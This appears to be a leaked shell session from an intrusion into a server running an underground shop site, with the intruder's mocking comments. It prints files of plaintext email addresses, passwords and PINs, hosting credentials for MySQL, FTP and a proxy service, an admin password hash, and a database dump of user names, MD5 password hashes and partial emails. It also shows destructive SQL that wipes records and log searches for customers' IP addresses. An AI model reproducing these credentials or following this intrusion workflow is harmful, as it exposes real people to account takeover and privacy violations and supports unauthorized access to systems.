mmgen www 353781 Jan 26 2011 store.rar -rw-r--r-- 1 mmgen www 74196 Jan 26 2011 title.gif -rw-r--r-- 1 mmgen www 76765 Jan 26 2011 title_unreg.gif -rw-r--r-- 1 mmgen www 2286399 Jan 26 2011 vorne.png -rw-r--r-- 1 mmgen www 1087 Jan 26 2011 wrub4sts.lnk # # cat passwords.txt j_username=sny@vtxmail.ch j_password=tino55 pin=tino55 j_username=office@vertec-systems.com j_password=121066 pin= j_username=DeineMutter@fickich.net j_password=Diehuredie pin=1234dudummestier j_username=HeyduFotze@magdich.net j_password=ArschPo pin=verarschmichnicht j_username=mybigmouth@web.de j_password=andrea pin=1950 j_username= j_password= pin= j_username=Rainer.Keberle@online.de j_password=finepix4700 pin= j_username=1746378 j_password= pin=q206mitte j_username=1746378 j_password= pin=q206mitte j_username=2187452 j_password= pin=q206mitte j_username=rababa@whitehouse.gov j_password=dollar pin=4711 j_username=170734837 j_password=express12 pin= j_username=office@otto-stoeckl.com j_password= pin= j_username=170734837 j_password=express pin=12 j_username=nicole.dargel@gmx.de j_password=Diving66 pin= j_username=claudia.schultz@shell.com j_password=chris1 pin=4449 j_username=claudia.schultz@shell.com j_password=chris1 pin=4449 j_username=claudia.schultz@shell.com j_password=chris1 pin= j_username=734093 j_password=19birgit pin=7578 j_username=734093 j_password=19nadine pin=7578 j_username=734093 j_password=birgit pin=7578 j_username=sabina.mastrogiovanni@gmx.de j_password=2dU8yU9qY4aC pin=5942 j_username=sabina.mastrogiovanni@gmx.de j_password=2dU8yU9qY4aC pin=5942 j_username=Heldmann_C@web.de j_password= pin=6237 j_username=Heldmann_C@web.de j_password= pin=6237 j_username=benjamin.egermann@gmail.com j_password=pcarmy pin=6039 j_username=sabina.mastrogiovanni@gmx.de j_password=2dU8yU9qY4aC pin=5942 j_username= j_password= pin= j_username=danisahne8283@aol.com j_password= pin=masenfan j_username=danisahne8282@aol.com j_password=masenfan pin=5556 j_username=danisahne8283@aol.com j_password= pin= j_username=danisahne8283@aol.com j_password=masenfan pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username= j_password= pin= j_username=hannesvw@gmail.com j_password= pin=9016 j_username=Thomas.Wunder@hv-s.de j_password=Mannheim pin= j_username=mail@obu-hamburg.de j_password=obu2009 pin= j_username=mail@obu-hamburg.de j_password=2493 pin= j_username=mail@obu-hamburg.de j_password=OBU2009 pin= j_username=31971258 j_password= pin=2493 j_username=mario.hoefler@web.de j_password=nutpen10 pin= j_username=E.Giegler@web.de j_password=Eschen pin=5115 j_username=E.Giegler@web.de j_password=Eschen pin=5115 j_username=mail@obu-hamburg.de j_password=obu2009 pin=2394 # cat Data.txt MySQL https://91.213.8.13/myadmin/ $host = localhost $user = Palshop $pass = u5AunWox $data = morgen_Palshop FTP: 91.213.8.26 morgen 2Rysb2Kv 5socks http://admin.5socks.net/ Morgen Kzmv7QkvIf 0458-8466-1325-4447 UVszBT <<<< 50?# # cd .. # cd .. # cd st0re.morgen.w2c.ru # ls -la total 16 drwxrwx--- 4 mmgen www 512 Dec 2 2010 . drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. drwxr-xr-x 5 mmgen www 512 Dec 2 2010 admin drwxr-xr-x 8 mmgen www 512 Dec 3 2010 content # cd admin # ls -la total 56 drwxr-xr-x 5 mmgen www 512 Dec 2 2010 . drwxrwx--- 4 mmgen www 512 Dec 2 2010 .. -rw-r--r-- 1 mmgen www 8621 Dec 2 2010 DE.lng -rw-r--r-- 1 mmgen www 1546 Dec 2 2010 admin.php -rw-r--r-- 1 mmgen www 708 Dec 3 2010 config.php drwxr-xr-x 3 mmgen www 512 Dec 2 2010 designe -rw-r--r-- 1 mmgen www 1008 Dec 2 2010 functions.php drwxr-xr-x 4 mmgen www 512 Dec 2 2010 img -rw-r--r-- 1 mmgen www 876 Dec 3 2010 index.php drwxr-xr-x 2 mmgen www 512 Dec 2 2010 pages # cat config.php # cd /home/mmgen/st0re.cc # ls -la total 1522696 drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 . drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. -rw-r--r-- 1 mmgen www 16950051 Sep 13 01:08 1.mp3 -rw-r--r-- 1 mmgen www 941752 Sep 30 16:19 2.rar -rw-r--r-- 1 mmgen www 144694 Jan 30 2011 3.jpeg -rw-r--r-- 1 mmgen www 760708777 Sep 13 00:58 4.rar -rw-r--r-- 1 mmgen www 30654 Feb 22 2011 Banner.jpg -rw-r--r-- 1 mmgen www 40505 Feb 7 2011 Banner4.jpg -rw-r--r-- 1 mmgen www 13347 Feb 3 2011 Jelly.jpg -rw-r--r-- 1 mmgen www 53943 Feb 3 2011 Kamagra.png drwxr-xr-x 3 mmgen www 512 Feb 21 2011 Neu drwxr-xr-x 3 mmgen www 512 Jun 2 18:52 Ref -rw-r--r-- 1 mmgen www 8967 Jul 17 16:04 Ukash.php -rw-r--r-- 1 mmgen www 4756 Jan 27 2011 account.php -rw-r--r-- 1 mmgen www 1532 Jan 27 2011 account_do.php -rw-r--r-- 1 mmgen www 978 Jan 27 2011 add_basket.php drwxr-xr-x 7 mmgen www 512 Mar 10 2011 admin -rw-r--r-- 1 mmgen www 164100 Apr 10 16:10 banner.gif -rw-r--r-- 1 mmgen www 2398 Jan 28 2011 basket.php -rw-r--r-- 1 mmgen www 11921 Jul 21 23:44 cashin.php -rw-r--r-- 1 mmgen www 2278 Apr 9 18:00 category.php -rw-r--r-- 1 mmgen www 5223 Mar 10 2011 cc_modul.php -rw-r--r-- 1 mmgen www 2265 Feb 8 2011 checkout.php -rw-r--r-- 1 mmgen www 1471 Jan 27 2011 error.php -rw-r--r-- 1 mmgen www 1007 Jan 27 2011 faq.php -rw-r--r-- 1 mmgen www 1406 Apr 18 12:49 favicon.ico -rw-r--r-- 1 mmgen www 17594 Jan 27 2011 head.png drwxr-xr-x 2 mmgen www 512 Aug 21 22:23 ico -rw-r--r-- 1 mmgen www 7623 Jun 2 19:58 index.php drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 libs -rw-r--r-- 1 mmgen www 886 Jan 27 2011 login.php -rw-r--r-- 1 mmgen www 1177 Jan 27 2011 login_do.php -rw-r--r-- 1 mmgen www 164 Jan 27 2011 logout.php -rw-r--r-- 1 mmgen www 1879 Jan 27 2011 product.php -rw-r--r-- 1 mmgen www 1319 Jan 27 2011 register.php -rw-r--r-- 1 mmgen www 1827 Jan 27 2011 register_do.php drwxr-xr-x 3 mmgen www 512 May 17 03:21 style -rw-r--r-- 1 mmgen www 8011 Apr 13 21:31 support.php -rw-r--r-- 1 mmgen www 2417 Apr 13 21:31 support_do.php # cd admin # ls -la total 268 drwxr-xr-x 7 mmgen www 512 Mar 10 2011 . drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .. -rw-r--r-- 1 mmgen www 106 May 17 13:31 .htaccess -rw-r--r-- 1 mmgen www 40 Jun 2 18:50 .htpasswd -rw-r--r-- 1 mmgen www 8372 Feb 8 2011 category.php drwxr-xr-x 2 mmgen www 512 Feb 8 2011 css -rw-r--r-- 1 mmgen www 4599 Jan 27 2011 faq.php drwxr-xr-x 6 mmgen www 512 Feb 8 2011 images -rw-r--r-- 1 mmgen www 14618 Mar 10 2011 index.php -rw-r--r-- 1 mmgen www 8549 Feb 13 2011 items.php drwxr-xr-x 7 mmgen www 512 Feb 8 2011 js drwxr-xr-x 3 mmgen www 512 Jan 27 2011 libs -rw-r--r-- 1 mmgen www 7359 Mar 10 2011 modul.php -rw-r--r-- 1 mmgen www 9007 Feb 8 2011 news.php -rw-r--r-- 1 mmgen www 1256 Jan 27 2011 option.php -rw-r--r-- 1 mmgen www 11703 Feb 8 2011 product.php drwxr-xr-x 3 mmgen www 512 Jan 27 2011 style -rw-r--r-- 1 mmgen www 18 Jan 29 2011 test.php -rw-r--r-- 1 mmgen www 10040 Apr 9 19:18 tickets.php -rw-r--r-- 1 mmgen www 12164 Feb 8 2011 user.php -rw-r--r-- 1 mmgen www 17532 Feb 8 2011 voucher.php # cat .htaccess AuthType Basic AuthName "FUCK YOU" AuthUserFile /home/mmgen/st0re.cc/admin/.htpasswd Require valid-user # cat .htpasswd Admin:$1$5KnX9ENu$aKqzHTLd5HpMqKqgnglUx/ # cd .. # cd libs # ls -la total 56 drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 . drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .. -rw-r--r-- 1 mmgen www 2757 Jan 27 2011 class_bbcode.php -rw-r--r-- 1 mmgen www 1561 Jan 28 2011 class_user.php -rw-r--r-- 1 mmgen www 227 Jun 2 18:20 mysql_config.php -rw-r--r-- 1 mmgen www 1312 Apr 11 00:18 psc_cashin.class.php -rw-r--r-- 1 mmgen www 4383 Jul 19 21:35 ukash_cashin.class.php -rw-r--r-- 1 mmgen www 7679 Apr 8 17:21 xxx_psc_cashin.class.php # cat mysql_config.php So let's check out their SHOP DB # mysql -u mmgen_shop -D mmgen_shop -p Enter password: Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 89332 Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> SHOW DATABASES; +--------------------+ | Database | +--------------------+ | information_schema | | mmgen_shop | | test | +--------------------+ 3 rows in set (0.00 sec) mysql> SHOW TABLES; +----------------------+ | Tables_in_mmgen_shop | +----------------------+ | shop_basket | | shop_ccmodul | | shop_coupon | | shop_faq | | shop_items | | shop_navigation | | shop_news | | shop_options | | shop_orders | | shop_products | | shop_tickets | | shop_user | | shop_voucher | +----------------------+ 13 rows in set (0.00 sec) mysql> # LOLOLO let's rm password info mysql> UPDATE shop_voucher SET infos = ""; Query OK, 11 rows affected (0.00 sec) Rows matched: 11 Changed: 11 Warnings: 0 mysql> SELECT * FROM shop_voucher; +-------+--------+------+---------------------+-------+-------+------------+ | payid | userid | type | code | infos | value | date | +-------+--------+------+---------------------+-------+-------+------------+ | 1872 | 10522 | 1 | 0905-1066-3280-8205 | | 10 | 2011-09-30 | | 1873 | 10522 | 1 | 0747-8763-8777-7583 | | 10 | 2011-09-30 | | 1874 | 10482 | 1 | 0170-8844-2643-6121 | | 10 | 2011-09-30 | | 1875 | 10161 | 1 | 0662-3887-5897-6736 | | 21 | 2011-09-30 | | 1877 | 8885 | 1 | 0795-2181-5472-4078 | | 10 | 2011-09-30 | | 1878 | 10575 | 1 | 0508-5218-3536-7066 | | 10 | 2011-09-30 | | 1869 | 10568 | 1 | 0725-8889-7048-6149 | | 10 | 2011-09-30 | | 1870 | 10300 | 1 | 0677-5871-1938-8696 | | 10 | 2011-09-30 | | 1871 | 10557 | 1 | 0570-2670-2925-4453 | | 100 | 2011-09-30 | | 1402 | 5356 | 0 | | | 0 | 2011-07-21 | | 1403 | 9652 | 0 | | | 0 | 2011-07-21 | +-------+--------+------+---------------------+-------+-------+------------+ 11 rows in set (0.00 sec) mysql> # Now how about we check who actually buys shit mysql> SELECT * FROM shop_user WHERE credits > 5; +--------+---------------+----------------------------------+--------------+---------+--------+---+ | userid | username | password | icq | credits | status | x | +--------+---------------+----------------------------------+--------------+---------+--------+---+ | 6 | J0hn.X3r | dbd570d9cfb7ee0473a7890e641a1f45 | 898437 | 20 | 0 | 0 | | 189 | Arma | 93f5d2a618cde4160d3eb8f748221f91 | arma@hush.ai | 10 | 0 | 0 | | 208 | iron.t | 9b630edecc947a5f9e5d4ca59462663f | iron.t@hotbo | 15 | 0 | 0 | | 514 | ngized | 3dcbb61d6599e4cbe89510c28f324f66 | camora18@web | 10 | 0 | 0 | | 571 | basha | 1618a9fe1c58f2bedd2fdccefaa6da21 | basha444@web | 9 | 0 | 0 | | 625 | stefgexp | 55132608a2fb68816bcd3d1caeafc933 | c.k.007@web. | 40 | 0 | 0 | | 794 | Tanoths | b5042eac66b4bdb8c6e42560f964ed3c | max@lilium-n | 23 | 0 | 0 | | 804 | TB4ever | 4be5ce67d73fb9b6dda4d91d45387d16 | jjstyler@liv | 7 | 0 | 0 | | 945 | Sven | 3dd19f98fd4adb12e6cee669341381aa | vb-sveiven@w | 10 | 0 | 0 | | 973 | binglly | 1a7384005bd77b151e11d58ac79da095 | binglly@web. | 10 | 0 | 0 | | 1120 | etrax | 4f0cb9262f0a0fdab6c9db4c122024c2 | etrax@secure | 10 | 0 | 0 | | 1174 | JUMPhil | 40d914022aca12c372304e1cf2e89b88 | 836499 | 9 | 0 | 0 | | 1195 | m0rpheus | 06aa90cb7e31b1de837cdfd4b837163c | m0rpheusz@o2 | 10 | 0 | 0 | | 1207 | HansMeier | 44354626326b1cd44cce845e8393ac0d | hansmeierfor | 6 | 0 | 0 | | 1353 | dr.mouse | b5ba41ed05b0b197546e2a4283af77ae | gucci23@hush | 7 | 0 | 0 | | 1691 | play | 0c2192030b08d26b06b073eef083548a | b4252353@ugg | 17 | 0 | 0 | | 1771 | fros | e0e93346794bf614a1f02254d9d8b21e | ritho.ritho@ | 10 | 0 | 0 | | 1810 | melvyn10 | 41df744f22aa3d7f81983a77e2899829 | melvyn10@081 | 15 | 0 | 0 | | 1941 | phyntox | 33d42d1eb34ec443704571b0ce34193e | phyntox@goog | 10 | 0 | 0 | | 1967 | fatal | 592b36d730c592cce0eebe1731d143ec | fatal3x@live | 7 | 0 | 0 | | 2010 | Dodo | d6d963cedb8dbc1ee57f271e942fbadd | bennibluemch | 7 | 0 | 0 | | 2301 | Blizzardo | 15b29ffdce66e10527a65bc6d71ad94d | blizzardfert | 10 | 0 | 0 | | 2415 | ecstasy | 887e1733037e9af10502b8bf923ad202 | Riehm93@onli | 6 | 0 | 0 | | 2478 | basics | cf7303a964a1682deeb3db90fbe3aeab | admin@mail-s | 6 | 0 | 0 | | 2630 | Stehlampe | db1527f7ecd3dd38f5de94e38cae2c53 | waswillstdud | 20 | 0 | 0 | | 2641 | mettwurst | 245a93ee61572bdda20c145374192603 | mettwurst@sa | 8 | 0 | 0 | | 2677 | Syntax | 068d03ef735f14d75cd78d0ad5e427a3 | psych0tik@li | 13 | 0 | | | 2696 | seife123 | a2327b1893edf0719cc1f29b8d807957 | azzzze@yahoo | 10 | 0 | 0 | | 2703 | fam0us | 8f036369a5cd26454949e594fb9e0a2d | ifam0us@hotm | 20 | 0 | 0 | | 2731 | Borni81 | 8d8e4a0f1607ecb8790bce4d03331749 | bornito@live | 6 | 0 | 0 | | 2763 | termi | 573bd983f1a92bb6cf8b535919e3a728 | Hans.olaf1@w | 6 | 0 | 0 | | 2827 | O.M.A. | 6b8d556a2c4e1a17c57c4019d58377f7 | Mueller_Simo | 7 | 0 | 0 | | 2861 | Epicfisch | 5785adb4d56e4dd0e2732c26ccc3a0ca | admin@stream | 10 | 0 | 0 | | 2960 | daunilein | 0e1ffc254643ad1b3a006a347146282f | downi@downi. | 6 | 0 | 0 | | 3101 | Pr3dator | 65a5a3d88782ceb6af221234670ec8fb | christian.ri | 13 | 0 | 0 | | 3135 | hassan3 | 8ce4ffbdd4b371c255be75734f26cd72 | guzter@ahoo. | 10 | 0 | 0 | | 3208 | maddox | 4a3ef4824d67af46ea57a39b72dea7df | a3351613@owl | 8 | 0 | 0 | | 3256 | k00ky | 649f7f3295eb1163604ce906b6a6c498 | k00ky@hotmai | 9 | 0 | 0 | | 3266 | 1337man | f29f5f0849fec2e6bc1c10de788410fa | roflfastlola | 11 | 0 | 0 | | 3321 | djinns | c316236440037c0a621d592222708b72 | djinnsrs@goo | 8 | 0 | 0 | | 3433 | fluxay | 64d1f88b9b276aece4b0edcc25b7a434 | dir@mailinat | 70 | 0 | 0 | | 3628 | BOMBER | 8e26756ab1075b72dd82965c3d67c162 | bersch5555@w | 6 | 0 | 0 | | 3731 | testuser0 | 68b62823ed173ad3bed0ce700d556b2a | b999347@owlp | 25 | 0 | 0 | | 3829 | Skywalker | 077efa5fc07874cb04bd359845314743 | b1459562@owl | 10 | 0 | 0 | | 3905 | Plasmasmog | ba9912907e468a911de722cd811b99b2 | Plasmasmog@m | 10 | 0 | 0 | | 3951 | master1234 | bffdd53cd1557a14c84b6f42f2012187 | forfreemovie | 10 | 0 | 0 | | 4038 | !XSS | 5b84d7e9450f523d263a1e2844d333da | xss-xss@Safe | 17 | 0 | 0 | | 4114 | sh0x | 7e573aedbe6d321228de54fcacee7ebd | leandroking@ | 6 | 0 | 0 | | 4121 | slice | c53c7a272390264c5e6beddcc410daa5 | esel@yahoo.d | 10 | 0 | 0 | | 4140 | Dennske | f8eb6ce796e56b0260d9e77c6e057a20 | wccrew@web.d | 10 | 0 | 0 | | 4144 | -Bounter- | 2fec358d161f20e1d51e24641d76312f | dreamy@warez | 10 | 0 | 0 | | 4470 | Phantonym | 95abaa72bd229ec8f058519bb4bcfe87 | Phantonym@hu | 11 | 0 | 0 | | 4474 | CyberTT | df53ca268240ca76670c8566ee54568a | a1679852@bof | 6 | 0 | 0 | | 4476 | Getter | 530ea1472e71035353d32d341ecf6343 | a1682682@bof | 50 | 0 | 0 | | 4808 | ceres2 | dd4df322be3679fc422ab3d45fc97e96 | ceres@imails | 13 | 0 | 0 | | 4846 | check | 3756dd32ed2706bb3b6fc004b0e4ef80 | senmobiles@h | 8 | 0 | 0 | | 4890 | lgdavid | 5daec48bdfda7423e079b99c80c13ed1 | david.wang20 | 7 | 0 | 0 | | 4919 | stronger87 | ea110dfdeb4b966c81f7d786df7b1192 | dirkbischof@ | 10 | 0 | 0 | | 4944 | burberry | 55f9c405bd87ba23896f34011ffce8da | burberry1337 | 6 | 0 | 0 | | 5088 | L4x1337 | 7518f76db987755dbb01c52e177ba134 | 591238155 | 8 | 0 | 0 | | 5126 | Neon | ab64f71b84891bc31fe85512d35716a8 | neon19881@we | 10 | 0 | 0 | | 5401 | schlecker | cf14f069b4e041d13f50361dd54b9a33 | sjsj@web.de | 8 | 0 | 0 | | 5446 | sexy1337 | e10adc3949ba59abbe56e057f20f883e | sadsadasdmer | 9 | 0 | 0 | | 5642 | firelabs | 076c91ca1a80a49970a3e094ef5954cf | fuckthatbitc | 10 | 0 | 0 | | 5727 | 2t-power | 0df174153bd462f50c728006d9d1c704 | eiermann@hus | 6 | 0 | 0 | | 6079 | pete | 620209aea87f7bae2bd2445d094ba275 | karl-otto3@w | 20 | 0 | 0 | | 6092 | accored | bc47508edab07c1a0082c714fdc08eab | acc0r3d@yaho | 18 | 0 | 0 | | 6167 | mercury | 98169b656c826331d6e9d5e334ca7be8 | fakemail@bla | 10 | 0 | 0 | | 6183 | Roxas | d412a68fd7624bfe220f55f53c26f5a7 | Roxas_1991@g | 20 | 0 | 0 | | 6187 | Redbullfly | 3a82ca9ca9bfe5db9d9eda406c13ac61 | Redbullfly@g | 8 | 0 | 0 | | 6263 | Madd1n | e2a2a6d692a27773a9da52f7e82cfde7 | martinkieser | 6 | 0 | 0 | | 6465 | terror | 9a1b0d5d2d14b7272183d51fe5914f25 | b1245111@lhs | 12 | 0 | 0 | | 6549 | drupp | e19d5cd5af0378da05f63f891c7467af | drupp88@goog | 53 | 0 | 0 | | 6590 | _wayne | dc8996397be86e49cb56fd6face00c7f | mkoch@live.d | 6 | 0 | 0 | | 6667 | krillewurm | 06e0274429fc435c0335237c0006f13c | easy-riderz@ | 25 | 0 | 0 | | 6689 | sundy | 263f55f9f491876ebe21af13c2ee4589 | ra.klaus.sta | 7 | 0 | 0 | | 6772 | 1311 | 2aed094745c811516aea636e52015bc8 | 2010@9y.com | 10 | 0 | 0 | | 6820 | drbob | edfff284ca91b5676d8caa85f0cfd1df | BlackDesire2 | 20 | 0 | 0 | | 6885 | Lankabel | 4297f44b13955235245b2497399d7a93 | 123@123.123 | 35 | 0 | | | 6953 | fr34c10 | 200820e3227815ed1756a6b531e7e0d2 | festner@mail | 10 | 0 | | | 7040 | Cysis | 984c8c7b5d1d358c1470b1a2f81cdd3b | 4216SD@gmail | 40 | 0 | | | 7042 | Fire | e94e346e5bb49449d6d607939ddbf63c | cyler@hotmai | 8 | 0 | | | 7072 | drbob100 | 8faddb27516de448b4f7a434b5a7130a | Blackddeess@ | 20 | 0 | | | 7105 | runner91 | 8a7d489dbea2c6d8ad710b47ea68bc05 | malli-2006@w | 7.5 | 0 | | | 7190 | jacov | f30d05ead11bea743d583e4282e304f6 | n0b0dy.fh@we | 7 | 0 | | | 7193 | kratos1 | 59779937922f0264885e4f871257be48 | fgikto@googl | 7 | 0 | | | 7227 | s30s | 5103c1995af9f7fc6751de332bcfdfd3 | xc0ree@cust. | 7 | 0 | | | 7603 | fws | 73cb82e5496bfc9e4a6bc70ea2826e56 | ao@f-ws.de | 32 | 0 | | | 7803 | CodeRed | e89b7c5cc238c5871ceeafe46d3d3154 | CodeRed94@ho | 6 | 0 | | | 7827 | liviu | 65399351c23e646ae6ad68c938015c14 | zut@wet.de | 6 | 0 | | | 7887 | Anything | 9f4633f632153c74bcddcbf9c1d2fbed | 113377 | 9 | 0 | | | 7899 | piren20 | cc03e747a6afbbcbf8be7668acfebee5 | mh.zeh@web.d | 10 | 0 | | | 7925 | sdffsf | c02711d20a521eb8d1e5aeefb6bbecab | dfds@sd.de | 7 | 0 | | | 8114 | sTiNN | 745c0ccdb25262e3a17afe9fd6456a5c | stinn@live.d | 6 | 0 | | | 8122 | bigdady | 9933fb405b690fb59015b8981e09e671 | 621178350 | 10 | 0 | | | 8249 | freestyl | 2968da776da97fdd7d4910189411804e | as7da9d@gmx. | 20 | 0 | | | 8324 | kamel | e73e1bd2feb22b75c0ec0cacfd0b9d25 | 81023871 | 13 | 0 | | | 8340 | iphonejumper | 5db9e40fd1ae010e435884cedbfde349 | | 7 | 0 | | | 8408 | joe321 | f36e8a3b77970d55a984672972555c40 | | 35 | 0 | | | 8414 | Crackfox | 10b43971a8295f3720f38fbcdd9d6ac6 | | 6 | 0 | | | 8470 | shoxx12 | 1e45690858e3dfdeebbd67eb5db2653b | | 5.5 | 0 | | | 8493 | alexander | dd22141acb5ea065acd5ed773729c98f | 000000 | 30 | 0 | | | 8554 | hurens0hn | 08ba21f5a9f192e3114ce9c3d29c0f8f | 383051368 | 25 | 0 | | | 8580 | Bester12 | 8e2a99e1e5e356f5b9b874c8d9d83c79 | 456 | 40 | 0 | | | 8627 | Kleedyyy | 8d0c8f9d1a9539021fda006427b993b9 | | 7 | 0 | | | 8645 | Energie | ea110dfdeb4b966c81f7d786df7b1192 | | 7 | 0 | | | 8691 | JimPanse | f56a8901702b2c279c065f2ca15890ec | | 8 | 0 | | | 8744 | cubee | 4a3ef4824d67af46ea57a39b72dea7df | | 7 | 0 | | | 8762 | Dodel | 5657c76ad9a05ea0d9899f94dc4121e9 | | 8 | 0 | | | 8826 | kuni77 | 22f3555c832cde0134c65e9cb44424ee | 615664295 | 7 | 0 | | | 8866 | sysfuck | 95a3d9c2bce545f46bc54d8a750438b1 | | 17.5 | 0 | | | 8879 | payment | ed8539ed5fe17d4dc3a18058831fb9bd | | 10 | 0 | | | 8890 | PolskaDumny | c288a40b22e236022e43f96cf7bab952 | 165-034 | 8.5 | 0 | | | 8933 | Dubstep | 3116ccacabe066ce091b171347fca80d | 427-073-373 | 25.2 | 0 | | | 8960 | Hotter | 0981ee032a8e8af483dc24390916c737 | 282979840 | 7.5 | 0 | | | 8969 | network44 | 44252cf93dd7a73ecc031f8363a26459 | 618445 | 10 | 0 | | | 9010 | sey | f2f6ca16e070070fc5465ab4209586b5 | | 10 | 0 | | | 9094 | MrPataa | 9c7b04e137048c6dc5bc2dae0f78bf68 | | 10 | 0 | | | 9122 | Semtex99 | 9ca40c627bb00f08347cf336fb09011b | | 9 | 0 | | | 9183 | trainee | a2147086850706ecb2b6f2919fed8e40 | 350610 | 7 | 0 | | | 9216 | opfa | 01fc7192adba9cbba78b612ebeca6b66 | | 11 | 0 | | | 9223 | ivory | 00b86e77b9f76fc1f466555b6af345f8 | | 10 | 0 | | | 9253 | blur121 | 7e4ea1bf5ca4e36d14e6296e485970f2 | | 10 | 0 | | | 9590 | kani2012 | ec11aacc5832b63f02f1269e89d3cdd7 | 858223 | 7 | 0 | | | 9269 | drm1hy | c6cb19878e6a335d4fabb115ca8e3605 | | 24 | 0 | | | 9273 | TrOvEjAr | 9378884c5f76bf23f5aaedd1035017ba | 234307423 | 20 | 0 | | | 9275 | gist505 | fcdd4eae6aff919545ff68b6e3943b91 | | 8.98 | 0 | | | 9298 | mrgreen | 824a67f29e97b8798a9df7f00189f3e1 | | 35 | 0 | | | 9307 | GStar | 2472ee727ed8de9a818fc657a6895646 | | 10 | 0 | | | 9310 | Domi93 | b36d331451a61eb2d76860e00c347396 | | 8 | 0 | | | 9348 | pwned | 530ea1472e71035353d32d341ecf6343 | | 6.5 | 0 | | | 9357 | darkt0wn | a56b6119d6c8be8e2d0d25bcfdca25c6 | | 10 | 0 | | | 9375 | optik | d6ae345d39ca27dcc9c8e9c30a814041 | | 7 | 0 | | | 9397 | U3 | 93327f2856df1105a1318895ac44e684 | 645458882 | 20.2 | 0 | | | 9410 | mule22 | d27c8e6c3222ea5da09eb7f0f9d56818 | | 7 | 0 | | | 9448 | BL4cKKS | cdbec512b7a848722346013aa3e44f8b | | 7 | 0 | | | 9508 | PEPPEP | 6ec176f463121c7a1fc2f442ba22e937 | | 6 | 0 | | | 9534 | Cardercc | 461ae6b500f5802d4d52b34643cdcc6e | | 11 | 0 | | | 9599 | nolandro | 78f5cf8d0ee4f6b1e612a36954c1254d | | 50 | 0 | | | 9600 | KoKaiiiN | dc74e595f9938b1ea1f1a078ae154949 | 363727670 | 6 | 0 | | | 9618 | D3DMan | e78e0c9c18a6490ef56c3ffe837e0fca | | 10.5 | 0 | | | 9621 | Abdulleben | 25d55ad283aa400af464c76d713c07ad | | 6.5 | 0 | | | 9631 | sexonthebeach | 2dfbaaecbe98198ace8c554cc426b6d4 | | 44 | 0 | | | 9701 | heiko4321 | 12a6265a271b7b23e943f5986d80d190 | | 7.5 | 0 | | | 9726 | albozz | d41d8cd98f00b204e9800998ecf8427e | | 18 | 0 | | | 9729 | Spexti | 4dfd9542414fed623b432aee923618d0 | | 6 | 0 | | | 9791 | Bastler | a278ec2edc9105bd52fe62254522ecd4 | | 20 | 0 | | | 9820 | vima | f3674879f5e18c7989e02235da302cc9 | | 20 | 0 | | | 9822 | xNiightx | ef605602b07ae6b27054649d92e28b3e | 474300093 | 19 | 0 | | | 9824 | bergwerk | c4fd4f3a6e0f9ccbc309a510a7efbad4 | | 12 | 0 | | | 9948 | funny333 | 56a876cce8c5d91ed47db1b742573d36 | | 17.5 | 0 | | | 9966 | Friedrich | 28acec923aa820ebbe028955a5a46356 | ja | 7 | 0 | | | 10035 | Auzodiox | 286119328282d5d64cf1a3a02aba6316 | | 15 | 0 | | | 10003 | donjuan | 6d11921056f42e148b13a528c82d174e | | 5.5 | 0 | | | 10005 | hajo22 | 566a1fc42bc3fa17a3920221d2b24d34 | | 6 | 0 | | | 10032 | golem | 62650cd9a5fb136dc137b155e4ae6f2a | | 15.5 | 0 | | | 10033 | blood | 42ee64c24d1efcc4c1916074461854f3 | | 10 | 0 | | | 10051 | Technoboom | 77711870d494d022654bcf842b603467 | | 7 | 0 | | | 10217 | LiBeRtY1338 | d41d8cd98f00b204e9800998ecf8427e | 634365955 | 9.1 | 0 | | | 10085 | mo100 | 7cc5a8be611ccce374885048bc2a4848 | | 32.5 | 0 | | | 10575 | Twix2010 | 75a593a34aa5ba8e5e5788b7c899802e | | 7 | 0 | | | 10216 | Spagel | 22243bfba05b9715e6303dacf7f66c90 | | 30 | 0 | | | 10391 | DerHase | e99a18c428cb38d5f260853678922e03 | | 7.5 | 0 | | | 10290 | samsamsam3 | 03f828f4b26b4ebab502c56a78cc0580 | 600148357 | 70 | 0 | | | 10304 | dasfrek | de68fbe75420c572d172d456ec9a48b3 | 158204790 | 13 | 0 | | | 10402 | Kevko | a0017f523db6e51a75f02647a89280bd | 480179 | 9 | 0 | | | 10440 | ahm123 | 97c45c9bb4cea4d08721d101388578bb | | 7 | 0 | | | 10555 | homer | f54146a3fc82ab17e5265695b23f646b | | 9 | 0 | | | 10557 | ccmajor | 1fafd7a63f5980302a5cdaa790988b7b | 158545 | 10 | 0 | | +--------+---------------+----------------------------------+--------------+---------+--------+---+ 169 rows in set (0.01 sec) mysql> Aborted # cd /var/log/httpd # Some recent ip adresses?^C # grep "st0re.cc.*POST.*login_do.php" httpd_20110930_* httpd_access.log httpd_20110930_a.log:st0re.cc 91.23.167.77 2 30.09.11 03:30:01 "POST /login_do.php HTTP/1.0" 47627 637 341 httpd_20110930_a.log:st0re.cc 87.168.17.156 2 30.09.11 04:13:28 "POST /login_do.php HTTP/1.0" 8509 726 323 httpd_20110930_a.log:st0re.cc 178.162.135.234 2 30.09.11 04:52:16 "POST /login_do.php HTTP/1.0" 8323 705 323 httpd_20110930_a.log:st0re.cc 80.142.47.156 2 30.09.11 05:06:21 "POST /login_do.php HTTP/1.0" 8148 634 323 httpd_20110930_a.log:st0re.cc 212.150.184.230 2 30.09.11 08:19:53 "POST /login_do.php HTTP/1.0" 8213 652 323 